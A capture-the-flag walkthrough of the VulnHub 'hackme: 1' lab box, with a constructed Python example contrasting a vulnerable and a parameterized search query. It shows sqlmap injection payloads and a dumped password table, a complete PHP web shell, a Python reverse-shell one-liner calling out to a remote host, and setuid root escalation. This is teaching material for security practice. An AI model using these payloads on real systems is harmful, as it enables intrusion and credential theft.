HACKME: 1

Information About the Machine

Description:
'hackme' is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment.

'hackme' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.

This works better with VirtualBox rather than VMware.

VulnHub Page:
https://www.vulnhub.com/entry/hackme-1,330/

Download Page:
https://download.vulnhub.com/hackme/hackme.ova

Walkthrough

Let's start by locating the machine on the network.

┌──(root💀kali)-[~]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.6.132  netmask 255.255.255.0  broadcast 192.168.6.255
        inet6 fe80::20c:29ff:fe97:a8e4  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:97:a8:e4  txqueuelen 1000  (Ethernet)
        RX packets 3  bytes 180 (180.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14  bytes 1054 (1.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08   VMware, Inc.
192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.
192.168.6.133   00:0c:29:20:57:2c   VMware, Inc.
192.168.6.254   00:50:56:fd:11:c9   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.993 seconds (128.45 hosts/sec). 4 responded

Let's continue with an nmap scan.

[*] Scan: 787
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 12:53 EDT
Nmap scan report for 192.168.6.133
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:20:57:2C (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms 192.168.6.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.59 seconds

Seeing port 80 open, I tried nikto and gobuster. After that I started examining the site in the browser.

┌──(root💀kali)-[~]
└─# gobuster dir --url http://192.168.6.133 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirb/big.txt --no-error | tee gobuster/1

tee: gobuster/1: No such file or directory
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.6.133
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip,7z,pcap,bak,sql,txt,rar,php5,sh,cap,php,html,conf,bash
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/07/09 10:40:09 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.133/.htpasswd.bak        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.rar        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.txt        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.pcap       (Status: 403) [Size: 302]
http://192.168.6.133/.htpasswd/           (Status: 403) [Size: 298]
http://192.168.6.133/.htpasswd.php5       (Status: 403) [Size: 302]
http://192.168.6.133/.htpasswd.sh         (Status: 403) [Size: 300]
http://192.168.6.133/.htpasswd.cap        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.html       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.cap        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.php        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.pcap       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.php5       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess/           (Status: 403) [Size: 298]
http://192.168.6.133/.htaccess.html       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.7z         (Status: 403) [Size: 300]
http://192.168.6.133/.htaccess.sh         (Status: 403) [Size: 300]
http://192.168.6.133/.htaccess.sql        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.txt        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.conf       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.bash       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.bak        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.zip        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.conf       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.rar        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.zip        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.7z         (Status: 403) [Size: 300]
http://192.168.6.133/.htpasswd.sql        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.php        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.bash       (Status: 403) [Size: 302]
http://192.168.6.133/config.php           (Status: 200) [Size: 0]  
http://192.168.6.133/icons/               (Status: 403) [Size: 294]
http://192.168.6.133/index.php            (Status: 200) [Size: 100]
http://192.168.6.133/logout.php           (Status: 200) [Size: 1245]
http://192.168.6.133/login.php            (Status: 200) [Size: 1245]
http://192.168.6.133/server-status/       (Status: 403) [Size: 302] 
http://192.168.6.133/register.php         (Status: 200) [Size: 1937]
http://192.168.6.133/uploads/             (Status: 200) [Size: 940] 
http://192.168.6.133/welcome.php          (Status: 200) [Size: 1245]

===============================================================
2021/07/09 10:40:41 Finished
===============================================================

The picture is clear. Either we get in, obtain a user account and SSH in, or we try to reach the machine through web vulnerabilities.

I tried SQLi on the login page but had no success. So I registered an account and logged in. Inside there was a book search feature; I suspected SQLi there, and found it with the HTTP request below.

┌──(root💀kali)-[~/oscp/hackme/istekler]
└─# cat search        
POST /welcome.php HTTP/1.1
Host: 192.168.6.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://192.168.6.133
Connection: close
Referer: http://192.168.6.133/welcome.php
Cookie: PHPSESSID=gqv7oiunpot6arc05huj5cpbnu
Upgrade-Insecure-Requests: 1

search=a
┌──(root💀kali)-[~/oscp/hackme]
└─# sqlmap -r istekler/search --level=5 --risk=3 --dbs --batch -D webapphacking -T users --dump 
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.5#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:21:04 /2021-07-09/

[11:21:04] [INFO] parsing HTTP request from 'istekler/search'
[11:21:04] [INFO] resuming back-end DBMS 'mysql' 
[11:21:04] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.6.133:80/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=a%' AND 8214=8214 AND 'SaZe%'='SaZe

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=a%' AND (SELECT 8586 FROM (SELECT(SLEEP(5)))AsNC) AND 'NOMn%'='NOMn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=a%' UNION ALL SELECT NULL,CONCAT(0x7178627671,0x4b694c626264456548675a4c55544a7054484a655764425a7a686a724349716a77764e456e77446d,0x7171716a71),NULL-- -
---
[11:21:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[11:21:05] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

[11:21:05] [INFO] fetching columns for table 'users' in database 'webapphacking'
[11:21:05] [INFO] fetching entries for table 'users' in database 'webapphacking'
[11:21:05] [INFO] recognized possible password hashes in column 'pasword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:21:05] [INFO] using hash method 'md5_generic_passwd'
[11:21:05] [INFO] resuming password 'hello' for hash '5d41402abc4b2a76b9719d911017c592'
[11:21:05] [INFO] resuming password 'commando' for hash '6269c4f71a55b24bad0f0267d9be5508'
[11:21:05] [INFO] resuming password 'p@ssw0rd' for hash '0f359740bd1cda994f8b55330c86d845'
[11:21:05] [INFO] resuming password 'testtest' for hash '05a671c66aefea124cc08b76ea6d30bb'
[11:21:05] [INFO] resuming password 'password1' for hash '7c6a180b36896a0a8c02787eeafb0e4c'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[11:21:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[11:21:05] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[11:21:05] [INFO] starting 4 processes 
Database: webapphacking                                                             
Table: users
[7 entries]
+----+--------------+------------+-----------------+----------------------------------------------+
| id | name         | user       | address         | pasword                                      |
+----+--------------+------------+-----------------+----------------------------------------------+
| 1  | David        | user1      | Newton Circles  | 5d41402abc4b2a76b9719d911017c592 (hello)     |
| 2  | Beckham      | user2      | Kensington      | 6269c4f71a55b24bad0f0267d9be5508 (commando)  |
| 3  | anonymous    | user3      | anonymous       | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd)  |
| 10 | testismyname | test       | testaddress     | 05a671c66aefea124cc08b76ea6d30bb (testtest)  |
| 11 | superadmin   | superadmin | superadmin      | 2386acb2cf356944177746fc92523983             |
| 12 | test1        | test1      | test1           | 05a671c66aefea124cc08b76ea6d30bb (testtest)  |
| 13 | admin        | admin      | [email protected] | 7c6a180b36896a0a8c02787eeafb0e4c (password1) |
+----+--------------+------------+-----------------+----------------------------------------------+

[11:21:13] [INFO] table 'webapphacking.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.133/dump/webapphacking/users.csv'
[11:21:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.133'

[*] ending @ 11:21:13 /2021-07-09/
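
A minimal reconstruction of the search handler behind the 'search' parameter, vulnerable form beside the hardened form, added here as an example: this is not the box's own PHP code (the walkthrough never shows its source), it is written in Python over an in-memory SQLite database instead of PHP/MySQL, and the books table and its rows are constructed. It replays sqlmap's boolean-based payload from the output above to show why string concatenation leaks a true/false oracle and a bound parameter does not.

```python
import sqlite3

# Constructed sample rows standing in for the book table the search queries
# (hypothetical schema; the page never shows the real one).
BOOKS = [
    (1, "Hacking Exposed", "Stuart McClure", 2012),
    (2, "The Web Application Hacker's Handbook", "Dafydd Stuttard", 2011),
    (3, "Practical Malware Analysis", "Michael Sikorski", 2012),
]

# The boolean-based blind payload sqlmap reported for 'search', plus the
# same payload with its condition made false (the attacker's "no" answer).
PAYLOAD_TRUE = "a%' AND 8214=8214 AND 'SaZe%'='SaZe"
PAYLOAD_FALSE = "a%' AND 8214=8215 AND 'SaZe%'='SaZe"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (id INTEGER, title TEXT, author TEXT, year INTEGER)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?, ?)", BOOKS)
    return conn


def search_vulnerable(conn, term):
    # The LIKE pattern is built by string concatenation: the quote in 'term'
    # closes the literal and everything after it is parsed as SQL, so the
    # injected condition decides whether rows come back.
    sql = f"SELECT id, title, author FROM books WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    # The wildcard pattern is assembled in code and bound as a parameter; the
    # engine treats 'term' purely as data, so the payload is just a string that
    # no title contains.
    sql = "SELECT id, title, author FROM books WHERE title LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def demo():
    # Row counts for each handler and payload; in the vulnerable handler the
    # count flips with the injected condition, in the safe one it stays 0.
    conn = make_db()
    return {
        "vuln_true": len(search_vulnerable(conn, PAYLOAD_TRUE)),
        "vuln_false": len(search_vulnerable(conn, PAYLOAD_FALSE)),
        "safe_true": len(search_safe(conn, PAYLOAD_TRUE)),
        "safe_false": len(search_safe(conn, PAYLOAD_FALSE)),
    }


if __name__ == "__main__":
    print(demo())
```

A normal term such as "malware" still returns its one matching row through both handlers, so the fix costs nothing in functionality.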

As can be seen, the superadmin user's hash was not cracked. I cracked this hash using an online service.

2386acb2cf356944177746fc92523983 (Uncrackable)

When I logged in with this account I saw that there was an upload feature, and I uploaded a web shell. The file I uploaded is below:

┌──(root💀kali)-[/home/kali/Desktop]
└─# cat simple-backdoor.php 
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

After that I obtained a reverse shell with python. Sample python command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

While looking around inside I also obtained the mysql credentials, but they were of no use to me.

I used the passwords obtained earlier in an SSH brute force with hydra. That did not work either.

Then I became root in a very simple and silly way.

www-data@hackme:/home/legacy$ ls
ls
total 20
drwxr-xr-x 2 root root 4096 Mar 26  2019 .
drwxr-xr-x 4 root root 4096 Mar 26  2019 ..
-rwsr--r-x 1 root root 8472 Mar 26  2019 touchmenot
www-data@hackme:/home/legacy$ 

www-data@hackme:/home/legacy$ strings tou   
strings touchmenot 

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.

www-data@hackme:/home/legacy$ touchmenot
touchmenot
touchmenot: command not found
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy# 

root@hackme:/home/legacy# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
Category: Walkthrough
